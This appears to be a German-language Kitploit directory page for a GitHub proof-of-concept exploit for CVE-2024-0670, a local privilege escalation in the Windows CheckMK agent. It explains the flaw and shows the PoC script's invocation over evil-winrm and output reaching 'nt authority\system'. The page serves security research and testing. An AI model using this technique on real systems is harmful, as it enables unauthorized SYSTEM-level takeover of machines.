Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-0670 — PoC for CVE-2024-0670 | Kitploit
Tools/GitHubGitHub/magicrc/cve-2024-0670
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & Education
GitHubmagicrc/cve-2024-0670

CVE-2024-0670

PoC for CVE-2024-0670

Repository anzeigen
1vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

CVE-2024-0670 PoC

Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für die Schwachstelle CVE-2024-0670, die den CheckMK-Agenten auf Windows-Systemen betrifft. Die Schwachstelle tritt auf, wenn der CheckMK-Agent temporäre Dateien im Verzeichnis C:\Windows\Temp erstellt und ausführt. Ein Angreifer kann dieses Verhalten ausnutzen, indem er bösartige Dateien mit Schreibschutz in diesem Verzeichnis vorab platziert. Wenn der Agent versucht, eine temporäre Datei zu erstellen, die bereits als schreibgeschützt existiert, kann er diese nicht überschreiben, führt aber dennoch die vorhandene Datei mit SYSTEM-Berechtigungen aus, was eine Privilegienausweitung ermöglicht.

Referenz des Sicherheitshinweises: SEC Consult – Lokale Privilegienausweitung über beschreibbare Dateien im Checkmk-Agenten


⚠️ HAFTUNGSAUSSCHLUSS

Dieses Projekt ist ausschließlich für Bildungs-, Forschungs- und autorisierte Sicherheitstestzwecke bestimmt.
Verwenden Sie diesen Code nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
Der Autor übernimmt keine Haftung für Schäden oder Missbrauch.


Verwendung

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"

Beispiel

root@kitploit:~
evil-winrm-py PS C:\Users\magicrc\Desktop> .\CVE-2024-0670.ps1 -MinPID 1000 -MaxPID 10000 -Cmd "whoami > C:\Windows\Temp\whoami.txt"
[+] Searching for Check MK installer... 
[+] Found: C:\Windows\Installer\1e6f2.msi
[+] Using command: whoami > C:\Windows\Temp\whoami.txt
[+] Preparing 18000 .cmd files...
[*] Progress: 0%
[*] Progress: 10%
[*] Progress: 20%
[*] Progress: 30%
[*] Progress: 40%
[*] Progress: 50%
[*] Progress: 60%
[*] Progress: 70%
[*] Progress: 80%
[*] Progress: 90%
[*] Progress: 100%
[+] Triggering MSI to execute command...
[+] Done
evil-winrm-py PS C:\Users\magicrc\Desktop> cat C:\Windows\Temp\whoami.txt
nt authority\system
Tool herunterladen